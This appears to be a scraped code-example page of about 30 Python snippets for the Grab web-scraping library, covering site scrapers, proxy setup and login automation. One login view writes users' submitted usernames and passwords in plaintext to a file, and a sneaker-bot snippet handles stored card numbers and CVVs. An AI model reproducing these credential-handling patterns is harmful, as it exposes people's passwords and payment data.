Python Grab示例，grab.Grab Python示例

示例#1

0

显示文件

def parse_review(url, df):
    x_rating = "//span[@itemprop=\"ratingValue\"]"
    x_text = "//div[@itemprop=\"reviewBody\"]"
    x_pro = "//span[@class=\"plus\"]"
    x_con = "//span[@class=\"minus\"]"

    g = grab.Grab()
    ua = random.choice(user_agents)
    print(ua)
    g.go(url, user_agent="%s" % ua)

    rating = g.doc.select(x_rating).text()
    text = " ".join(g.doc.select(x_text).text_list())

    text = text.replace(".", ". ")
    text = text.replace(",", ", ")
    text = text.replace("!", "! ")

    try:
        pro = " ".join(g.doc.select(x_pro).text_list())
        con = " ".join(g.doc.select(x_con).text_list())
    except Exception:
        pro = float('NaN')
        con = float('NaN')
    # time.sleep(120)

    df.loc[len(df)] = [rating, text, pro, con]
    return df

示例#2

0

显示文件

def parse_playlist_time(url: str) -> (int, List[Tuple[str, str]]):
    """Функция парсит страницу плейлиста и подсчитывает сумму продолжительности роликов."""

    import grab
    g = grab.Grab()

    if PROXY:
        g.setup(proxy=PROXY, proxy_type=PROXY_TYPE)

    # Передаю невалидный User-Agent чтобы ютуб вернул отрендеренную страницу (данные в HTML будут)
    # а не страницу с скриптом -- данные будут как объект javacript
    g.setup(headers={'User-Agent': 'null'})

    g.go(url)

    video_list = g.doc.select('//*[@class="pl-video yt-uix-tile "]')
    time_list = g.doc.select('//*[@class="timestamp"]')

    total_seconds = 0
    items = []

    for title, time in zip(video_list, time_list):
        title = title.attr('data-title')
        time_str = time.text()
        items.append((title, time_str))

        total_seconds += time_to_seconds(time_str)

    return total_seconds, items

示例#3

0

显示文件

def count_total_playlist_time(url, proxy=None, proxy_type='http'):
    """Функция парсит страницу плейлиста и подсчитывает сумму продолжительности роликов."""

    import grab
    g = grab.Grab()
    if proxy:
        g.setup(proxy=proxy, proxy_type=proxy_type)

    g.go(url)

    video_list = g.doc.select('//*[@class="pl-video yt-uix-tile "]')
    time_list = g.doc.select('//*[@class="timestamp"]')

    total_seconds = 0

    print('Playlist:')
    for i, (video, time) in enumerate(zip(video_list, time_list), 1):
        time_str = time.text()
        print('{}. {} ({})'.format(i, video.attr('data-title'), time_str))

        time_split = time_str.split(':')
        if len(time_split) == 3:
            h, m, s = map(int, time_split)
            total_seconds += h * 60 * 60 + m * 60 + s
        elif len(time_split) == 2:
            m, s = map(int, time_split)
            total_seconds += m * 60 + s
        else:
            total_seconds += int(time_split[0])

    return total_seconds

示例#4

0

显示文件

文件： otzovik.py 项目： Amarilllis/Diploma

def gather_models(url):
    g = grab.Grab()
    g.go(url)

    links = g.doc.select(
        "//*[@id='content']/div[2]/div[2]/div[2]/div/div[3]/a")
    print(links)

示例#5

0

显示文件

文件： browser.py 项目： vikas-lamba/python-suseapi

    def __init__(self,
                 user,
                 password,
                 base,
                 useragent=None,
                 transport='pycurl'):
        self.base = base
        self.user = user
        self.password = password

        self.cookie_set = False

        # Browser instance
        self.browser = grab.Grab(timeout=DEFAULT_TIMEOUT)
        self.browser.setup_transport(transport)
        if transport == "urllib3":
            import urllib3
            import certifi
            self.browser.transport.pool = urllib3.PoolManager(
                cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
        # Grab automatically handles cookies.

        # Are we anonymous?
        self.anonymous = (user == '')

        # Identify ourselves
        if useragent is not None:
            self.browser.setup(headers={'User-agent': useragent})

示例#6

0

显示文件

    def start_button(self):
        link = self.ui.lineEdit.text()

        if re.search('https://www.supremenewyork.com/shop/(.+?)', link):

            # Getting all the values from the database to fill in the delivery information with the bot:
            db_data = DB.execute(
                'select * from USER_DATA where id=2').fetchall()

            DATA['url_1'] = link
            DATA['name'] = db_data[0][1]
            DATA['email'] = db_data[0][2]
            DATA['tel'] = db_data[0][3]
            DATA['address'] = db_data[0][4]
            DATA['city'] = db_data[0][5]
            DATA['post_code'] = db_data[0][6]
            DATA['country'] = db_data[0][7]
            DATA['card'] = db_data[0][8]
            DATA['card_number'] = db_data[0][9]
            DATA['valid_month'] = db_data[0][10]
            DATA['valid_year'] = db_data[0][11]
            DATA['cvv'] = db_data[0][12]

            if self.ui.radioButton_8.isChecked():
                DATA['size'] = 'Medium'

            elif self.ui.radioButton_9.isChecked():
                DATA['size'] = 'Large'

            elif self.ui.radioButton_10.isChecked():
                DATA['size'] = 'XLarge'

            if self.ui.radioButton.isChecked():
                DATA['img'] = 'on'

            elif self.ui.radioButton_2.isChecked():
                DATA['img'] = 'off'

            # Check proxy valid:
            if self.ui.lineEdit_12.text():
                checker = grab.Grab()
                checker.setup(proxy=self.ui.lineEdit_12.text().strip(),
                              proxy_type='http',
                              connect_timeout=5,
                              timeout=5)

                try:
                    checker.go('https://www.supremenewyork.com/')

                    DATA['proxy'] = self.ui.lineEdit_12.text().strip()

                    self.bot_thread = OrderThread()
                    self.bot_thread.start()
                except grab.GrabError:
                    self.proxy_error = ProxyError()
                    self.proxy_error.show()
            else:
                self.bot_thread = OrderThread()
                self.bot_thread.start()

示例#7

0

显示文件

	def __getPage(self, url, hammer_mode=True):
		g = grab.Grab()
		g.setup(connect_timeout=1, timeout=3)
		g.setup(hammer_mode=hammer_mode, hammer_timeouts=(
			(3, 5), (5, 7), (7, 9), (15, 20), (50, 60)
		))
		g.go(url)
		return g.response

示例#8

0

显示文件

 def __init__(self, config):
     self.order = config['order']
     self.grab_connect_timeout = int(config['connect_timeout'])
     self.grab_download_timeout = int(config['download_timeout'])
     self.grab = grab.Grab()
     self.grab.setup(connect_timeout=self.grab_connect_timeout,
                     timeout=self.grab_download_timeout)
     self.proxy_list_filename = ''

示例#9

0

显示文件

 def __init__(self, workdir):
     self.workdir = workdir.rstrip(os.path.sep) + os.path.sep
     self.g = grab.Grab()
     self.g.cookies.set(name='over18',
                        value='yeah',
                        domain='.imgsrc.ru',
                        path='/',
                        expires=time.time() + 3600 * 24)
     self.go(self.host)

示例#10

0

显示文件

文件： openweather.py 项目： RuDevelooper/Geekbrains

 def _auth_and_get_api_key(self):
     g = grab.Grab()
     g.go(url='https://home.openweathermap.org/users/sign_in')
     g.doc.set_input('user[email]', self.user)
     g.doc.set_input('user[password]', self.password)
     g.doc.submit()
     g.go(url='https://home.openweathermap.org/api_keys')
     for i in g.doc(".//div").text_list():
         if not re.match('Key Name [a-zA-Z0-9]*.*', i) is None:
             return i.split()[2]

示例#11

0

显示文件

文件： ittoolbox.py 项目： vvydrin/tech-parser

def get_articles():
	g = grab.Grab()
	parser.setup_grab(g)
	
	g.go("http://it.toolbox.com")
	
	css_path = ".tile .tileContent div .floatleft a"
	
	posts = parser.get_articles(g, css_path, css_path, "ittoolbox")
	
	return posts

示例#12

0

显示文件

文件： htmltoreadable.py 项目： shigarus/NewsParser

def test():
    g = grab.Grab()
    g.go('http://habrahabr.ru/post/266293/')
    root_node = g.doc.tree.cssselect('.post_show')[0]
    text = hr.html_to_readable(root_node)
    path = 'out'
    if not os.path.exists(path):
        os.mkdir(path)
    outpath = os.path.join(path, 'out.log')
    with codecs.open(outpath, 'w', encoding='utf-8') as fh:
        fh.write(text)

示例#13

0

显示文件

def get_data(url):
    df = pd.DataFrame(columns=['Time', 'Parking', 'Level', 'Option', 'Spaces'])
    update_time = datetime.datetime.now()
    html_doc = grab.Grab().go(url).body
    soup = BeautifulSoup(html_doc, 'lxml')
    structures = soup.find_all('table')
    for structure in structures:
        structure_df = get_parking(structure, update_time)
        df = df.append(structure_df, ignore_index=True)

    return df

示例#14

0

显示文件

def login(user, password):
    g = grab.Grab()
    g.setup(post={
        "user[email]": user,
        "user[password]": password,
        "grant_type": "password",
        "authenticity_token": "undefined"
    },
            timeout=60000)
    g.go(SIGN_IN_URL)
    return g

示例#15

0

显示文件

def gather_models(url):
    g = grab.Grab()
    g.go(url)

    links = []
    flinks = g.doc.select("//*[@id='content']/div[2]/div[2]/div/div/div[3]/a")

    for fl in flinks:
        links.append("http://irecommend.ru" + fl.attr("href"))

    # print(links)
    return links

示例#16

0

显示文件

 def search(self,
            search_term="",
            journal_title_issn="",
            volume_year="",
            issue="",
            pages="",
            number_results=25):
     g = grab.Grab()
     request = {
         "s": search_term,
         "journalid": journal_title_issn,
         "v": volume_year,
         "i": issue,
         "p": pages,
         "redirect": "0"
     }
     if sys.version_info[0] < 3:
         url = self.url+"?"+ \
                 urllib.urlencode(request)
     else:
         url = self.url+"?"+ \
                 urllib.parse.urlencode(request)
     g.go(url)
     search_result = []
     #body > font:nth-child(7) Displayed first  100  results
     #body > font:nth-child(7) Found 1 results
     nresults = re.search(
         r'([0-9]*) results',
         g.doc.select("/html/body/font[1]").one().text())
     nresults = int(nresults.group(1))
     pages_to_load = int(math.ceil(number_results /
                                   25.0))  # Pages needed to be loaded
     # Check if the pages needed to be loaded are more than the pages available
     if pages_to_load > int(math.ceil(nresults / 25.0)):
         pages_to_load = int(math.ceil(nresults / 25.0))
     for page in range(1, pages_to_load + 1):
         if len(search_result
                ) > number_results:  # Check if we got all the results
             break
         url = ""
         request.update({"page": page})
         if sys.version_info[0] < 3:
             url = self.url+"?"+ \
                 urllib.urlencode(request)
         else:
             url = self.url+"?"+ \
                 urllib.parse.urlencode(request)
         g.go(url)
         search_result += self.__parse(g)
         if page != pages_to_load:
             # Random delay because if you ask a lot of pages,your ip might get blocked.
             time.sleep(random.randint(250, 1000) / 1000.0)
     return search_result[:number_results]

示例#17

0

显示文件

文件： cvedetails-client.py 项目： marky24/cvedetails-client

 def __init__(self, **kwargs):
     self.result = None
     self.g = grab.Grab(timeout=5, connect_timeout=5, user_agent='METASCAN')
     page_type = self.determine_page_type(self.search_url.format(**kwargs))
     logger.info(page_type)
     if page_type == 'error':
         self.result = None
     elif page_type == 'search_page':
         self.search_page(**kwargs)
         self.result = self.make_json_from_page()
     elif page_type == 'vulns_page':
         self.vulns_page()
         self.result = self.make_json_from_page()

示例#18

0

显示文件

    def setup_grab(self):
        self.grab = grab.Grab()

        self.current_proxy = random.choice(self.proxy_list)
        first_slash_index = self.current_proxy['_id'].find('/')
        proxy_type = self.current_proxy['_id'][:first_slash_index - 1]
        proxy_address = self.current_proxy['_id'][first_slash_index + 2:]
        proxy_lag = self.current_proxy['latency']

        self.grab.setup(connect_timeout=self.grab_connect_timeout + proxy_lag,
                        timeout=self.grab_download_timeout + proxy_lag,
                        proxy=proxy_address,
                        proxy_type=proxy_type)

示例#19

0

显示文件

文件： tasks.py 项目： dcn01/link-extractor

def process_url(url):
    logger.info('Processing %s...' % url)

    g = grab.Grab()
    resp = g.go(url)

    links = []
    for found_url in parser.parse_urls(resp.body.decode()):
        logger.info('Found URL: %s' % found_url)
        links.append(found_url)

    if links:
        io.save_links(url, links)

示例#20

0

显示文件

文件： server.py 项目： notcuc/fanuc_painter_server

def del4flash():
    g = grab.Grab()
    g.go('http://172.25.63.1/myconnect/')
    text = g.css_text('body')
    text = text.split()
    already = 0
    for i in range(len(text)):
        if text[i] == 'Size' or already == 1:
            if already == 0:
                already = 1
                continue
            else:
                r = requests.delete('http://172.25.63.1/myconnect/' + text[i])

示例#21

0

显示文件

def gather_reviews(url, proxy):
    g = grab.Grab()
    # g.setup(proxy=proxy)
    g.go(url)

    links = []
    flinks = g.doc.select(
        "//*[@id=\"quicktabs_tabpage_12388_myreviewinfo\"]/div/div/div/ul/li/div/div/p/nobr/a"
    )
    "//*[@id=\"quicktabs_tabpage_12388_myreviewinfo\"]/div/div[1]/div/ul/li/div/div/p/nobr/a"
    for fl in flinks:
        print(fl)
        links.append("http://irecommend.ru" + fl.attr("href"))

    return links

示例#22

0

显示文件

文件： main.py 项目： ubahnverleih/NewsGrabber

def main():
    settings.init()
    settings.logger = log.Log(settings.log_file_name)
    settings.logger.daemon = True
    settings.logger.start()
    settings.logger.log(
        'Starting grabber {name}'.format(name=settings.irc_nick))

    tools.create_dir(settings.dir_ready)
    tools.create_dir(settings.dir_new_lists)
    tools.create_dir(settings.dir_old_lists)

    if not os.path.isfile(settings.target_main):
        raise Exception(
            "Please add a rsync target to file '{settings.target_main}'.".
            format(**locals()))

    settings.irc_bot = irc.IRC()
    settings.irc_bot.daemon = True
    settings.irc_bot.start()
    time.sleep(30)
    settings.upload = upload.Upload()
    settings.upload.daemon = True
    settings.upload.start()
    settings.grab = grab.Grab()
    settings.grab.daemon = True
    settings.grab.start()

    while settings.running:
        #    if not settings.logger.isAlive():
        #        print('The logger stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The logger stopped running...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        #    if not settings.irc_bot.isAlive():
        #        print('The IRC bot stopped running...')
        #        settings.running = False
        #    if not settings.upload.isAlive():
        #        print('The uploader stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The uploader stopped running...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        #    if not settings.grab.isAlive():
        #        print('The grabber stopped running...')
        #        settings.irc_bot.send('PRIVMSG', 'The grabber stopped working...',
        #                settings.irc_channel_bot)
        #        settings.running = False
        time.sleep(1)

示例#23

0

显示文件

 def _get(self, url, **kwargs):
     grabber = grab.Grab()
     grabber.reset()
     grabber.setup(
         connect_timeout=5,
         timeout=300,
         hammer_mode=True,
         hammer_timeouts=((300, 360), (360, 420), (420, 480)),
     )
     if kwargs:
         grabber.setup(**kwargs)
     if self.proxy_enabled:
         if hasattr(self, 'proxy'):
             grabber.setup(proxy=self.proxy, proxy_type='http')
         if hasattr(self, 'proxy_auth'):
             grabber.setup(proxy_userpwd=self.proxy_auth)
     grabber.go(url)
     return grabber.response.body

示例#24

0

显示文件

async def prx_srv(proxies):
    while True:
        proxy_for_parser = await proxies.get()
        print('start_proxy_for_parser')
        print('Found proxy: %s' % proxy_for_parser)
        g = grab.Grab()
        print('1')
        g.setup(proxy=proxy_for_parser.host + ':' + str(proxy_for_parser.port),
                proxy_type='http')
        print('2')
        try:

            g.go('http://www.google.com/search?q=Spam')
        except:
            pass
        print('2.1')
        print(g.doc.url)
        print('3')
        proxy_for_parser = await proxies.get()

示例#25

0

显示文件

def parse_article_image(article, site_url=''):
    try:
        img = article.cssselect('img:first-child')[0]
        img.set('class', '')
        img.set('id', '')
        img.set('align', '')
        img.set('src', absolutize_link(img.get('src', ''), site_url))
        return tostring(img).strip()
    except IndexError:
        return b''
    except AttributeError:
        try:
            img = grab.Grab(article).css_one('img:first-child')
        except GrabError:
            return b''
        img.set('class', '')
        img.set('id', '')
        img.set('align', '')
        img.set('src', absolutize_link(img.get('src'), site_url))
        return tostring(img).strip()

示例#26

0

显示文件

def get_articles():
	g = grab.Grab()
	parser.setup_grab(g)
	
	g.go('http://planet.clojure.in')
	
	css_path = '.entry .article > h2 a'
	summary_texts = []
	for elem in g.css_list(".entry .article"):
		text = ''
		for children in elem.getchildren()[1:-1]:
			text += parser.remove_bad_tags(tostring(children).decode())
		summary_texts.append(text)
			
	posts = parser.get_articles(g, css_path, css_path,
		'planetclojure', 'planet.clojure.in')
	
	for (post, summary_text) in zip(posts, summary_texts):
		post['summary'] = summary_text
	
	return posts

示例#27

0

显示文件

        def search(self, search_term="", pages="", number_results=25):
            # TODO: Add Batch search for comics.
            g = grab.Grab()
            request = {"s": search_term, "p": pages}
            if sys.version_info[0] < 3:
                url = self.url+"?"+ \
                        urllib.urlencode(request)
            else:
                url = self.url+"?"+ \
                        urllib.parse.urlencode(request)
            g.go(url)
            search_result = []
            nresults = re.search(
                r'([0-9]*) results',
                g.doc.select("/html/body/font[1]").one().text())

            nresults = int(nresults.group(1))
            pages_to_load = int(math.ceil(number_results /
                                          25.0))  # Pages needed to be loaded
            # Check if the pages needed to be loaded are more than the pages available
            if pages_to_load > int(math.ceil(nresults / 25.0)):
                pages_to_load = int(math.ceil(nresults / 25.0))
            for page in range(1, pages_to_load + 1):
                if len(search_result
                       ) > number_results:  # Check if we got all the results
                    break
                url = ""
                request.update({"page": page})
                if sys.version_info[0] < 3:
                    url = self.url+"?"+ \
                        urllib.urlencode(request)
                else:
                    url = self.url+"?"+ \
                        urllib.parse.urlencode(request)
                g.go(url)
                search_result += self.__parse(g)
                if page != pages_to_load:
                    # Random delay because if you ask a lot of pages,your ip might get blocked.
                    time.sleep(random.randint(250, 1000) / 1000.0)
            return search_result[:number_results]

示例#28

0

显示文件

 def __choose_mirror(self):
     g = grab.Grab()
     if self.mirrors is None:
         raise MissingMirrorsError("There are no mirrors!")
     if isinstance(self.mirrors, str):
         self.mirrors = [self.mirrors]
     last = len(self.mirrors) - 1
     for i, mirror in enumerate(self.mirrors):
         try:
             if sys.version_info[0] < 3:
                 url = mirror
                 g.go(url)
             else:
                 url = mirror
                 g.go(url)
             self.__selected_mirror = mirror
             categories = g.doc(
                 "//input[contains(@name,'lg_topic')]").node_list()
             for category in categories:
                 if category.attrib["value"] == "libgen":
                     self.libgen = self.__Libgen(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "scimag":
                     self.scimag = self.__Scimag(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "fiction":
                     self.fiction = self.__Fiction(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
                 elif category.attrib["value"] == "comics":
                     self.comics = self.__Comics(
                         g.make_url_absolute(
                             category.getnext().attrib["href"]))
             break
         except grab.GrabError:
             if i == last:
                 raise MirrorsNotResolvingError("None of the mirrors are resolving, check" + \
                                                "if they are correct or you have connection!")

示例#29

0

显示文件

 def search(self, search_term, column="title", number_results=25):
     g = grab.Grab()
     request = {"req": search_term, "column": column}
     if sys.version_info[0] < 3:
         url = self.url+"/search.php?"+ \
                 urllib.urlencode(request)
     else:
         url = self.url+"/search.php?"+ \
                 urllib.parse.urlencode(request)
     g.go(url)
     search_result = []
     nbooks = re.search(
         r'([0-9]*) (books|files)',
         g.doc.select("/html/body/table[2]/tr/td[1]/font").text())
     nbooks = int(nbooks.group(1))
     pages_to_load = int(math.ceil(number_results /
                                   25.0))  # Pages needed to be loaded
     # Check if the pages needed to be loaded are more than the pages available
     if pages_to_load > int(math.ceil(nbooks / 25.0)):
         pages_to_load = int(math.ceil(nbooks / 25.0))
     for page in range(1, pages_to_load + 1):
         if len(search_result
                ) > number_results:  # Check if we got all the results
             break
         url = ""
         request.update({"page": page})
         if sys.version_info[0] < 3:
             url = self.url+"/search.php?"+ \
                 urllib.urlencode(request)
         else:
             url = self.url+"/search.php?"+ \
                 urllib.parse.urlencode(request)
         g.go(url)
         search_result += self.__parse(g.doc)
         if page != pages_to_load:
             # Random delay because if you ask a lot of pages,your ip might get blocked.
             time.sleep(random.randint(250, 1000) / 1000.0)
     return search_result[:number_results]

示例#30

0

显示文件

def login(request):


    uname = request.POST.get("username")
    pwd = request.POST.get("password")

    g = grab.Grab(timeout=30,user_agent="Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)")
    g.go("https://login.uci.edu/ucinetid/webauth")
    g.doc.set_input('ucinetid', uname)
    g.doc.set_input('password', pwd)
    resp = g.doc.submit()

    mySoup = BeautifulSoup(resp.body, "html.parser")
    s = mySoup.find("div", {"id": "error-message"})
    try:
        return render(request,"login.html",{"data":[s.get_text()]})
    except:
        f = open("encript.txt", 'w')
        f.write(uname)
        f.write(",")
        f.write(pwd)
        f.close()
    return render(request, "search.html");